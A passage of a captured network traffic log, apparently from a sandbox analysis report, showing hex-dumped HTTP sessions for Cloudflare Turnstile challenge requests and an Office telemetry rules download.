                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:48 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:48 GMT
                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                            Content-Length: 1
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-10-08 03:08:48 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 30 4c 64 47 32 6f 68 7a 31 50 5a 61 75 41 32 4c 62 4e 47 57 78 53 6a 4e 4c 65 41 31 34 6a 71 52 42 65 43 65 30 4a 66 43 69 43 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g0LdG2ohz1PZauA2LbNGWxSjNLeA14jqRBeCe0JfCiCQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                            2024-10-08 03:08:48 UTC1INData Raw: 4a
                                                                                                                                                            Data Ascii: J


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            22192.168.2.54974113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:50 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:50 UTC540INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:50 GMT
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Content-Length: 218853
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public
                                                                                                                                                            Last-Modified: Sun, 06 Oct 2024 16:59:23 GMT
                                                                                                                                                            ETag: "0x8DCE6283A3FA58B"
                                                                                                                                                            x-ms-request-id: 86eceaf5-401e-00a3-6fa2-188b09000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030850Z-1657d5bbd48xlwdx82gahegw4000000004fg00000000rmnp
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:50 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                            Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                            Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                            Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                            Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                            Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                            Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                            Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                            2024-10-08 03:08:50 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                            Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            23192.168.2.549744104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:50 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cf2ed9a6c2641de/1728356926478/QCsHjgUpquPAy0Z HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:50 UTC170INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:50 GMT
                                                                                                                                                            Content-Type: image/png
                                                                                                                                                            Content-Length: 61
                                                                                                                                                            Connection: close
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2edc159294271-EWR
                                                                                                                                                            2024-10-08 03:08:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 17 00 00 00 1e 08 02 00 00 00 48 47 12 3f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                            Data Ascii: PNGIHDRHG?IDAT$IENDB`


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            24192.168.2.549748104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:51 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 31436
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            CF-Challenge: 91fa21b380c2c82
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:51 UTC16384OUTData Raw: 76 5f 38 63 66 32 65 64 39 61 36 63 32 36 34 31 64 65 3d 2d 58 52 51 73 74 42 53 39 4d 39 78 67 4b 70 24 49 24 36 4d 52 74 74 42 43 24 6c 51 4e 66 42 70 71 42 48 24 5a 66 78 47 42 6a 24 4d 66 42 57 42 4e 24 67 50 66 55 24 42 39 6b 69 42 65 24 6f 66 62 56 64 24 55 54 6e 42 72 24 4d 67 42 54 5a 45 66 55 35 24 6a 51 51 78 47 38 31 6e 42 47 24 34 51 74 57 24 58 71 71 35 74 24 61 24 24 67 36 24 4a 6c 6c 24 43 4e 71 47 35 4d 36 4c 49 51 24 6c 55 73 24 4c 6a 42 62 39 24 34 6b 42 66 50 24 36 66 42 32 24 42 53 48 31 75 45 33 77 32 57 24 55 66 6b 38 6f 6f 78 66 6d 55 35 24 74 68 6a 38 6e 4e 65 51 38 6b 5a 39 51 4b 71 58 36 57 5a 45 24 24 53 24 6e 6c 74 50 6b 63 55 6d 53 51 79 50 34 52 48 53 51 61 51 24 68 6f 4d 4d 71 6f 31 31 4f 39 31 53 50 44 35 50 24 36 4d 44 51
                                                                                                                                                            Data Ascii: v_8cf2ed9a6c2641de=-XRQstBS9M9xgKp$I$6MRttBC$lQNfBpqBH$ZfxGBj$MfBWBN$gPfU$B9kiBe$ofbVd$UTnBr$MgBTZEfU5$jQQxG81nBG$4QtW$Xqq5t$a$$g6$Jll$CNqG5M6LIQ$lUs$LjBb9$4kBfP$6fB2$BSH1uE3w2W$Ufk8ooxfmU5$thj8nNeQ8kZ9QKqX6WZE$$S$nltPkcUmSQyP4RHSQaQ$hoMMqo11O91SPD5P$6MDQ
                                                                                                                                                            2024-10-08 03:08:51 UTC15052OUTData Raw: 51 42 59 58 61 6e 6b 66 55 6e 78 6c 78 46 55 6a 57 67 51 36 33 66 33 48 56 78 4f 24 52 24 72 24 78 52 24 4b 58 78 24 66 69 24 36 24 57 51 74 70 24 4d 24 62 6e 24 4a 24 45 24 4b 6e 78 6c 24 4f 24 78 24 78 67 6c 46 24 24 52 24 63 24 52 24 36 52 78 34 6e 45 24 4e 52 24 4d 24 49 51 74 24 42 64 24 4a 51 4e 39 42 6e 24 67 24 4b 54 48 44 24 65 51 2d 67 42 6e 24 5a 51 74 24 24 30 24 73 51 24 51 42 73 51 52 79 6a 4e 78 6b 66 4b 24 62 65 35 6c 24 47 24 2d 39 78 48 41 31 57 62 44 74 74 24 4a 58 74 49 24 2b 51 4b 24 62 44 42 45 51 67 51 24 67 24 62 24 73 30 52 39 42 39 6e 71 4d 78 5a 74 46 6c 31 24 52 65 74 53 42 59 24 34 66 4b 45 51 24 51 70 52 57 35 42 67 51 67 46 74 69 42 6c 51 42 66 6a 53 42 72 24 5a 52 78 30 42 51 51 53 52 4b 69 24 39 51 49 52 62 64 42 6c 51 6b
                                                                                                                                                            Data Ascii: QBYXankfUnxlxFUjWgQ63f3HVxO$R$r$xR$KXx$fi$6$WQtp$M$bn$J$E$Knxl$O$x$xglF$$R$c$R$6Rx4nE$NR$M$IQt$Bd$JQN9Bn$g$KTHD$eQ-gBn$ZQt$$0$sQ$QBsQRyjNxkfK$be5l$G$-9xHA1WbDtt$JXtI$+QK$bDBEQgQ$g$b$s0R9B9nqMxZtFl1$RetSBY$4fKEQ$QpRW5BgQgFtiBlQBfjSBr$ZRx0BQQSRKi$9QIRbdBlQk
                                                                                                                                                            2024-10-08 03:08:52 UTC300INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                            Content-Length: 26808
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-chl-gen: 2Pihl/ZXhUVcFXI5oeaFoBFHrRz0ZVv1zAsuc3ggcoJGQoSh1qqzXNPin1r8GK5Tiuc6VJC3akrtd2t9$peaL1W1JGlF3lYNc
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2edc8d8980f5f-EWR
                                                                                                                                                            2024-10-08 03:08:52 UTC1069INData Raw: 75 62 2f 47 6b 70 4b 43 69 36 47 6e 6d 36 43 66 73 4a 4c 47 72 4e 57 4d 79 37 62 56 30 35 53 36 32 64 65 56 71 39 54 63 79 39 6e 64 35 38 44 51 70 65 62 6e 32 65 7a 6f 75 65 66 71 78 63 65 30 31 50 4c 4f 39 76 4f 33 75 50 7a 38 30 41 43 33 2b 75 7a 58 77 37 76 57 36 4e 33 56 30 67 62 71 32 2b 2f 47 2b 67 6a 50 45 51 2f 4d 41 52 55 4a 38 66 6b 64 7a 67 30 52 32 74 7a 79 37 76 4d 44 34 66 66 65 47 43 44 6e 4b 51 7a 6e 35 50 6f 77 42 2b 77 79 2f 53 55 70 4d 69 45 53 46 77 67 4f 46 44 73 57 4c 42 45 41 47 6b 55 4f 52 43 41 55 42 66 77 39 52 77 34 6c 43 78 30 61 55 55 49 53 45 31 4e 4e 54 52 59 33 55 46 6b 2b 48 52 30 67 56 6d 4e 42 48 55 56 50 51 46 6f 2b 59 45 31 6d 56 32 51 39 62 31 6f 73 53 57 70 65 52 30 73 34 51 6e 6b 36 4e 44 35 70 50 46 31 59 59 47 55
                                                                                                                                                            Data Ascii: ub/GkpKCi6Gnm6CfsJLGrNWMy7bV05S62deVq9Tcy9nd58DQpebn2ezouefqxce01PLO9vO3uPz80AC3+uzXw7vW6N3V0gbq2+/G+gjPEQ/MARUJ8fkdzg0R2tzy7vMD4ffeGCDnKQzn5PowB+wy/SUpMiESFwgOFDsWLBEAGkUORCAUBfw9Rw4lCx0aUUISE1NNTRY3UFk+HR0gVmNBHUVPQFo+YE1mV2Q9b1osSWpeR0s4Qnk6ND5pPF1YYGU
